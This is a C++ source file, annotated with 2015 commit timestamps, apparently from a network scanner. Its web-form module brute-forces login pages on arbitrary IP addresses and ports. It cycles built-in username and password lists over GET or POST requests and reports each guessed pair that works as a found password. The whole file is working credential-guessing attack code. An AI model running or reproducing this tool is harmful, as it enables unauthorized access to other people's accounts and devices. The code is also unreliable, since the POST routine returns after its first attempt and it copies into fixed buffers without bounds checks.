2015-03-22 00:43:15 +00:00
# include "WebformWorker.h"
2015-03-25 14:29:08 +00:00
# include "FileUpdater.h"
2015-03-06 14:32:36 +00:00
2015-03-05 14:29:05 +00:00
lopaStr WFClass : : parseResponse ( const char * ip ,
const int port ,
const std : : string * buffer ,
const char * formVal ,
2015-03-24 14:29:27 +00:00
const char * login ,
const char * pass ) {
2015-03-05 14:29:05 +00:00
2015-04-04 07:24:31 +00:00
lopaStr result = { " UNKNOWN " , " " , " " } ;
2015-03-05 14:29:05 +00:00
if ( buffer - > size ( ) ! = 0 )
{
if ( Utils : : ci_find_substr ( * buffer , std : : string ( formVal ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " denied " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " Location: " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " Authentication required " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " invalid " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " err " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " .href " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " .replace " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " .location " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " 501 not implemented " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " http-equiv " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " busy " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " later " ) ) = = - 1
& & Utils : : ci_find_substr ( * buffer , std : : string ( " forbidden " ) ) = = - 1
) {
stt - > doEmition_BAGreenData ( " [+] " + QString ( ip ) + " : " + QString : : number ( port ) + " - WF pass: " +
2015-03-24 14:29:27 +00:00
QString ( login ) + " : " + QString ( pass ) ) ;
strcpy ( result . login , login ) ;
strcpy ( result . pass , pass ) ;
2015-03-05 14:29:05 +00:00
return result ;
} else {
if ( Utils : : ci_find_substr ( * buffer , std : : string ( " 501 not implemented " ) ) ! = - 1 ) stt - > doEmitionRedFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: 501 Not Implemented. " ) ;
if ( Utils : : ci_find_substr ( * buffer , std : : string ( " 404 not found " ) ) ! = - 1 ) stt - > doEmitionRedFoundData ( " <a href= \" http:// " + QString ( ip ) + " : " + QString : : number ( port ) + " \" ><font color= \" #c3c3c3 \" > " + QString ( ip ) + " : " + QString : : number ( port ) + " </font></a> - [WF]: 404 Not Found. " ) ;
return result ;
}
}
else return result ;
}
2015-03-22 00:43:15 +00:00
lopaStr WFClass : : doGetCheck ( const char * ip ,
2015-03-05 14:29:05 +00:00
int port ,
char * actionVal ,
char * userVal ,
char * passVal ,
char * formVal ) {
2015-04-04 07:24:31 +00:00
lopaStr result = { " UNKNOWN " , " " , " " } ;
2015-03-05 14:29:05 +00:00
int passCounter = 0 ;
int firstCycle = 0 ;
2015-03-24 14:29:27 +00:00
char login [ 128 ] = { 0 } ;
char pass [ 32 ] = { 0 } ;
2015-03-05 14:29:05 +00:00
for ( int i = 0 ; i < MaxWFLogin ; + + i )
{
2015-03-23 08:39:37 +00:00
if ( ! globalScanFlag ) break ;
2015-03-24 14:29:27 +00:00
strcpy ( login , wfLoginLst [ i ] ) ;
2015-03-05 14:29:05 +00:00
for ( int j = firstCycle ; j < MaxWFPass ; + + j )
{
2015-03-23 08:39:37 +00:00
if ( ! globalScanFlag ) break ;
2015-03-24 14:29:27 +00:00
strcpy ( pass , wfPassLst [ j ] ) ;
2015-03-05 14:29:05 +00:00
2015-03-24 14:29:27 +00:00
int rSize = strlen ( ip ) + strlen ( actionVal ) + strlen ( userVal ) + strlen ( login ) + strlen ( passVal ) + strlen ( pass ) + 4 ;
2015-03-05 14:29:05 +00:00
if ( rSize > 256 ) {
stt - > doEmitionRedFoundData ( " [WF] Wrong request size! ( " + QString ( ip ) + " : " + QString : : number ( port ) + " ) " ) ;
return result ;
} ;
char nip [ 256 ] = { 0 } ;
2015-03-24 14:29:27 +00:00
sprintf ( nip , " %s%s?%s=%s&%s=%s " , ip , actionVal , userVal , login , passVal , pass ) ;
2015-03-05 14:29:05 +00:00
std : : string buffer ;
2015-04-04 07:24:31 +00:00
if ( Connector : : nConnect ( nip , port , & buffer ) < = 0 ) return result ;
2015-03-05 14:29:05 +00:00
2015-03-24 14:29:27 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked WF: " + QString ( ip ) + " : " + QString : : number ( port ) +
" ; login/pass: " + QString ( login ) + " : " + QString ( pass ) +
2015-04-04 07:24:31 +00:00
" ; - Progress: ( " +
QString : : number ( ( passCounter + + / ( double ) ( MaxWFPass * MaxWFLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
2015-03-05 14:29:05 +00:00
2015-03-24 14:29:27 +00:00
result = parseResponse ( ip , port , & buffer , formVal , login , pass ) ;
2015-03-05 14:29:05 +00:00
if ( i = = 0 ) + + i ;
}
firstCycle = 1 ;
}
return result ;
}
2015-03-22 00:43:15 +00:00
lopaStr WFClass : : doPostCheck ( const char * ip ,
2015-03-05 14:29:05 +00:00
int port ,
char * actionVal ,
char * userVal ,
char * passVal ,
char * formVal ) {
2015-04-04 07:24:31 +00:00
lopaStr result = { " UNKNOWN " , " " , " " } ;
2015-03-05 14:29:05 +00:00
int passCounter = 0 ;
int firstCycle = 0 ;
2015-03-24 14:29:27 +00:00
char login [ 128 ] = { 0 } ;
char pass [ 32 ] = { 0 } ;
2015-03-05 14:29:05 +00:00
for ( int i = 0 ; i < MaxWFLogin ; + + i )
{
2015-03-23 08:39:37 +00:00
if ( ! globalScanFlag ) break ;
2015-03-24 14:29:27 +00:00
strcpy ( login , wfLoginLst [ i ] ) ;
2015-03-05 14:29:05 +00:00
for ( int j = firstCycle ; j < MaxWFPass ; + + j )
{
2015-03-23 08:39:37 +00:00
if ( ! globalScanFlag ) break ;
2015-03-24 14:29:27 +00:00
strcpy ( pass , wfPassLst [ j ] ) ;
2015-03-05 14:29:05 +00:00
2015-03-24 14:29:27 +00:00
int rSize = strlen ( ip ) + strlen ( actionVal ) + strlen ( userVal ) + strlen ( login ) + strlen ( passVal ) + strlen ( pass ) + 4 ;
2015-03-05 14:29:05 +00:00
if ( rSize > 256 ) {
stt - > doEmitionRedFoundData ( " [WF] Wrong request size! ( " + QString ( ip ) + " : " + QString : : number ( port ) + " ) " ) ;
return result ;
} ;
char nip [ 256 ] = { 0 } ;
char postData [ 256 ] = { 0 } ;
sprintf ( nip , " %s%s " , ip , actionVal ) ;
2015-03-24 14:29:27 +00:00
sprintf ( postData , " %s=%s&%s=%s " , userVal , login , passVal , pass ) ;
2015-03-05 14:29:05 +00:00
std : : string buffer ;
2015-04-04 07:24:31 +00:00
if ( Connector : : nConnect ( nip , port , & buffer , postData ) < = 0 ) return result ;
2015-03-05 14:29:05 +00:00
2015-03-24 14:29:27 +00:00
if ( BALogSwitched ) stt - > doEmitionBAData ( " Checked WF: " + QString ( ip ) + " : " + QString : : number ( port ) + " ; login/pass: " +
QString ( login ) + " : " + QString ( pass ) + " ; - Progress: ( " +
QString : : number ( ( passCounter / ( double ) ( MaxWFPass * MaxWFLogin ) ) * 100 ) . mid ( 0 , 4 ) + " %) " ) ;
2015-03-05 14:29:05 +00:00
+ + passCounter ;
2015-03-24 14:29:27 +00:00
return parseResponse ( ip , port , & buffer , formVal , login , pass ) ;
2015-03-05 14:29:05 +00:00
if ( i = = 0 ) + + i ;
}
firstCycle = 1 ;
}
return result ;
}
2015-03-22 00:43:15 +00:00
lopaStr WFClass : : _WFBrute ( const char * ip ,
2015-03-05 14:29:05 +00:00
int port ,
char * methodVal ,
char * actionVal ,
char * userVal ,
char * passVal ,
char * formVal ) {
2015-04-04 12:43:22 +00:00
lopaStr lps = { " UNKNOWN " , " " , " " } ;
2015-03-05 14:29:05 +00:00
if ( strstri ( methodVal , " get " ) ! = NULL ) {
2015-04-03 14:36:22 +00:00
lps = doGetCheck ( ip , port , actionVal , userVal , passVal , formVal ) ;
2015-03-05 14:29:05 +00:00
} else if ( strstri ( methodVal , " post " ) ! = NULL ) {
2015-04-03 14:36:22 +00:00
lps = doPostCheck ( ip , port , actionVal , userVal , passVal , formVal ) ;
2015-03-05 14:29:05 +00:00
} else {
stt - > doEmitionFoundData ( " <a href= \" http:// " + QString ( ip ) +
" : " + QString : : number ( port )
+ " \" ><font color= \" #c3c3c3 \" > " +
QString ( ip ) + " : " + QString : : number ( port ) +
" </font></a> - [WF]: Unknown method. " ) ;
} ;
2015-04-03 14:36:22 +00:00
return lps ;
2015-03-05 14:29:05 +00:00
}
